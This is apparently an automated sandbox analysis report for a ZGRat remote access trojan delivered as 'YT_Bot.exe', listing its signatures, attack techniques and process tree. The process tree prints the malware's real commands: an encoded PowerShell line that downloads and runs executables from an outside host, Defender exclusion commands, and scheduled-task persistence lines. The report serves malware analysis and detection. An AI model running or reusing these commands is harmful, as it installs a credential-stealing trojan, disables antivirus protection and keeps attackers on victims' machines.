zgrat | 4f9ea4d924204eed91a7b78dd1ea384507277ae18aaa247e8aa076eb5ea22cb8

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
14-05-2024 15:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

YT_Bot.exe
Size

2.4MB
MD5

04f2679bb77721b9130be049bf9d37b8
SHA1

5ab36346e37971cf53850faf964442b6330f9451
SHA256

4f9ea4d924204eed91a7b78dd1ea384507277ae18aaa247e8aa076eb5ea22cb8
SHA512

cf1e0e4504d59d867d80d41065b7f206b7928aae81d76ad681762a70fbd441a9f2d239a0ef9ef581c6736ddcd4878952a09382b4d2f494aaed654538e0d5c8cc
SSDEEP

49152:CXjWphUswawH27MSJ7WZ4agjZbaHKgJZ6dEhBlbSkfzPs2sHAiinn:Q6HUdawH27hWZ4agtbsZ6+hBoJ2sHAi2

Score

10^/10

zgrat execution rat spyware stealer

Malware Config

Signatures

Detect ZGRat V1 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe	family_zgrat_v1
C:\ChainReview\ythyperRuntimedhcpSvc.exe	family_zgrat_v1
behavioral1/memory/404-96-0x0000000000360000-0x0000000000566000-memory.dmp	family_zgrat_v1

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2476	4480	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4884	4480	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2160	4480	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3304	4480	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3404	4480	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3196	4480	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4088	4480	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2796	4480	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4048	4480	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1892	4480	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1604	4480	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2944	4480	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1000	4480	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4280	4480	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2468	4480	schtasks.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 3624 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

3624 powershell.exe
2060 powershell.exe
4924 powershell.exe
2336 powershell.exe
1724 powershell.exe
1228 powershell.exe
Downloads MZ/PE file

flow	pid	process
4	3624	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ythyperRuntimedhcpSvc.exeWScript.exeythyperRuntimedhcpSvc.exeYT_Bot.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	ythyperRuntimedhcpSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	ythyperRuntimedhcpSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	YT_Bot.exe

Executes dropped EXE 4 IoCs

Processes:

Youtube-Viewers.exeythyperRuntimedhcpSvc.exeythyperRuntimedhcpSvc.exewinlogon.exe

pid process

4112 Youtube-Viewers.exe
2548 ythyperRuntimedhcpSvc.exe
404 ythyperRuntimedhcpSvc.exe
1128 winlogon.exe
Loads dropped DLL 2 IoCs

Processes:

Youtube-Viewers.exe

pid process

4112 Youtube-Viewers.exe
4112 Youtube-Viewers.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

YT_Bot.exe

pid process

2840 YT_Bot.exe

pid	process
4112	Youtube-Viewers.exe
2548	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
1128	winlogon.exe

pid	process
4112	Youtube-Viewers.exe
4112	Youtube-Viewers.exe

pid	process
2840	YT_Bot.exe

Drops file in Program Files directory 2 IoCs

Processes:

ythyperRuntimedhcpSvc.exe

description	ioc	process
File created	C:\Program Files (x86)\Windows Photo Viewer\en-US\RuntimeBroker.exe	ythyperRuntimedhcpSvc.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\en-US\9e8d7a4ca61bd9	ythyperRuntimedhcpSvc.exe

Drops file in Windows directory 3 IoCs

Processes:

ythyperRuntimedhcpSvc.exe

description	ioc	process
File created	C:\Windows\Resources\Ease of Access Themes\38384e6a620884	ythyperRuntimedhcpSvc.exe
File created	C:\Windows\Resources\Ease of Access Themes\SearchApp.exe	ythyperRuntimedhcpSvc.exe
File opened for modification	C:\Windows\Resources\Ease of Access Themes\SearchApp.exe	ythyperRuntimedhcpSvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3304	schtasks.exe
3404	schtasks.exe
1604	schtasks.exe
4280	schtasks.exe
2796	schtasks.exe
2468	schtasks.exe
2944	schtasks.exe
2476	schtasks.exe
3196	schtasks.exe
4088	schtasks.exe
4048	schtasks.exe
1892	schtasks.exe
4884	schtasks.exe
2160	schtasks.exe
1000	schtasks.exe

Modifies registry class 2 IoCs

Processes:

ythyperRuntimedhcpSvc.exeythyperRuntimedhcpSvc.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	ythyperRuntimedhcpSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	ythyperRuntimedhcpSvc.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4912 PING.EXE

pid	process
4912	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeythyperRuntimedhcpSvc.exe

pid	process
3624	powershell.exe
3624	powershell.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe
404	ythyperRuntimedhcpSvc.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exeythyperRuntimedhcpSvc.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewinlogon.exe

description	pid	process
Token: SeDebugPrivilege	3624	powershell.exe
Token: SeDebugPrivilege	404	ythyperRuntimedhcpSvc.exe
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	1228	powershell.exe
Token: SeDebugPrivilege	1128	winlogon.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

YT_Bot.exe

pid process

2840 YT_Bot.exe

pid	process
2840	YT_Bot.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

YT_Bot.exepowershell.exeythyperRuntimedhcpSvc.exeWScript.execmd.exeythyperRuntimedhcpSvc.execmd.exe

description	pid	process	target process
PID 2840 wrote to memory of 3624	2840	YT_Bot.exe	powershell.exe
PID 2840 wrote to memory of 3624	2840	YT_Bot.exe	powershell.exe
PID 2840 wrote to memory of 3624	2840	YT_Bot.exe	powershell.exe
PID 3624 wrote to memory of 4112	3624	powershell.exe	Youtube-Viewers.exe
PID 3624 wrote to memory of 4112	3624	powershell.exe	Youtube-Viewers.exe
PID 3624 wrote to memory of 4112	3624	powershell.exe	Youtube-Viewers.exe
PID 3624 wrote to memory of 2548	3624	powershell.exe	ythyperRuntimedhcpSvc.exe
PID 3624 wrote to memory of 2548	3624	powershell.exe	ythyperRuntimedhcpSvc.exe
PID 3624 wrote to memory of 2548	3624	powershell.exe	ythyperRuntimedhcpSvc.exe
PID 2548 wrote to memory of 4168	2548	ythyperRuntimedhcpSvc.exe	WScript.exe
PID 2548 wrote to memory of 4168	2548	ythyperRuntimedhcpSvc.exe	WScript.exe
PID 2548 wrote to memory of 4168	2548	ythyperRuntimedhcpSvc.exe	WScript.exe
PID 4168 wrote to memory of 3352	4168	WScript.exe	cmd.exe
PID 4168 wrote to memory of 3352	4168	WScript.exe	cmd.exe
PID 4168 wrote to memory of 3352	4168	WScript.exe	cmd.exe
PID 3352 wrote to memory of 404	3352	cmd.exe	ythyperRuntimedhcpSvc.exe
PID 3352 wrote to memory of 404	3352	cmd.exe	ythyperRuntimedhcpSvc.exe
PID 404 wrote to memory of 1228	404	ythyperRuntimedhcpSvc.exe	powershell.exe
PID 404 wrote to memory of 1228	404	ythyperRuntimedhcpSvc.exe	powershell.exe
PID 404 wrote to memory of 1724	404	ythyperRuntimedhcpSvc.exe	powershell.exe
PID 404 wrote to memory of 1724	404	ythyperRuntimedhcpSvc.exe	powershell.exe
PID 404 wrote to memory of 2336	404	ythyperRuntimedhcpSvc.exe	powershell.exe
PID 404 wrote to memory of 2336	404	ythyperRuntimedhcpSvc.exe	powershell.exe
PID 404 wrote to memory of 4924	404	ythyperRuntimedhcpSvc.exe	powershell.exe
PID 404 wrote to memory of 4924	404	ythyperRuntimedhcpSvc.exe	powershell.exe
PID 404 wrote to memory of 2060	404	ythyperRuntimedhcpSvc.exe	powershell.exe
PID 404 wrote to memory of 2060	404	ythyperRuntimedhcpSvc.exe	powershell.exe
PID 404 wrote to memory of 3156	404	ythyperRuntimedhcpSvc.exe	cmd.exe
PID 404 wrote to memory of 3156	404	ythyperRuntimedhcpSvc.exe	cmd.exe
PID 3156 wrote to memory of 3772	3156	cmd.exe	chcp.com
PID 3156 wrote to memory of 3772	3156	cmd.exe	chcp.com
PID 3156 wrote to memory of 4912	3156	cmd.exe	PING.EXE
PID 3156 wrote to memory of 4912	3156	cmd.exe	PING.EXE
PID 3156 wrote to memory of 1128	3156	cmd.exe	winlogon.exe
PID 3156 wrote to memory of 1128	3156	cmd.exe	winlogon.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe
"C:\Users\Admin\AppData\Local\Temp\YT_Bot.exe"
1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2840

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAbABqACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagB0AGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBoAGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB6AHQAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAHAAZABiACcALAAgADwAIwBqAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AegB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAbABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFkAbwB1AHQAdQBiAGUALQBWAGkAZQB3AGUAcgBzAC4AcABkAGIAJwApACkAPAAjAGYAagBkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAHgAbQBsACcALAAgADwAIwBiAHQAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAbABsACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAegBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AeABtAGwAJwApACkAPAAjAGUAdwBxACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBMAGUAYQBmAC4AeABOAGUAdAAuAGQAbABsACcALAAgADwAIwBhAGsAYwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AdQB3ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAcQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAZQBhAGYALgB4AE4AZQB0AC4AZABsAGwAJwApACkAPAAjAHMAZwBhACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlAC4AYwBvAG4AZgBpAGcAJwAsACAAPAAjAHYAeAB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAawB2AG0AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbgBnAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAuAGMAbwBuAGYAaQBnACcAKQApADwAIwB6AGMAaQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AYwBsAC8AWQBvAHUAdAB1AGIAZQAtAFYAaQBlAHcAZQByAHMALgBlAHgAZQAnACwAIAA8ACMAbQBkAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAHcAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAGYAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlACcAKQApADwAIwBqAG0AcAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwB5AHQAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcALAAgADwAIwBmAHgAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG4AcQBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAcQBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwApACkAPAAjAHUAYQBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHMAbgByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBmAGYAdQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBZAG8AdQB0AHUAYgBlAC0AVgBpAGUAdwBlAHIAcwAuAGUAeABlACcAKQA8ACMAYQBqAGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdQBhAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAcAB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAdABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwApADwAIwBmAGUAYQAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3624

C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe
"C:\Users\Admin\AppData\Local\Temp\Youtube-Viewers.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4112

C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe
"C:\Users\Admin\AppData\Roaming\ythyperRuntimedhcpSvc.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2548

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ChainReview\OBg87LaDbDWQsMY7IUT23EbHgKkyJlfFMrfs5jJR.vbe"
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ChainReview\EG6ATP28z0IboPcWhHfEXGTe81jh.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:3352

C:\ChainReview\ythyperRuntimedhcpSvc.exe
"C:\ChainReview/ythyperRuntimedhcpSvc.exe"
6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Ease of Access Themes\SearchApp.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\msedge.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\en-US\RuntimeBroker.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\TextInputHost.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\winlogon.exe'
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\k0OYDjyvqU.bat"
7⤵
- Suspicious use of WriteProcessMemory
PID:3156

C:\Windows\system32\chcp.com
chcp 65001
8⤵
PID:3772

C:\Windows\system32\PING.EXE
ping -n 10 localhost
8⤵
- Runs ping.exe
PID:4912

C:\Users\Default\Saved Games\winlogon.exe
"C:\Users\Default\Saved Games\winlogon.exe"
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,15140928051103392835,1612840580898364401,262144 --variations-seed-version --mojo-platform-channel-handle=4336 /prefetch:8
1⤵
PID:4864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Windows\Resources\Ease of Access Themes\SearchApp.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Windows\Resources\Ease of Access Themes\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 10 /tr "'C:\Windows\Resources\Ease of Access Themes\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2160

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\msedge.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\RuntimeBroker.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\RuntimeBroker.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 12 /tr "'C:\ChainReview\TextInputHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\ChainReview\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 9 /tr "'C:\ChainReview\TextInputHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Saved Games\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Default\Saved Games\winlogon.exe'" /rl HIGHEST /f
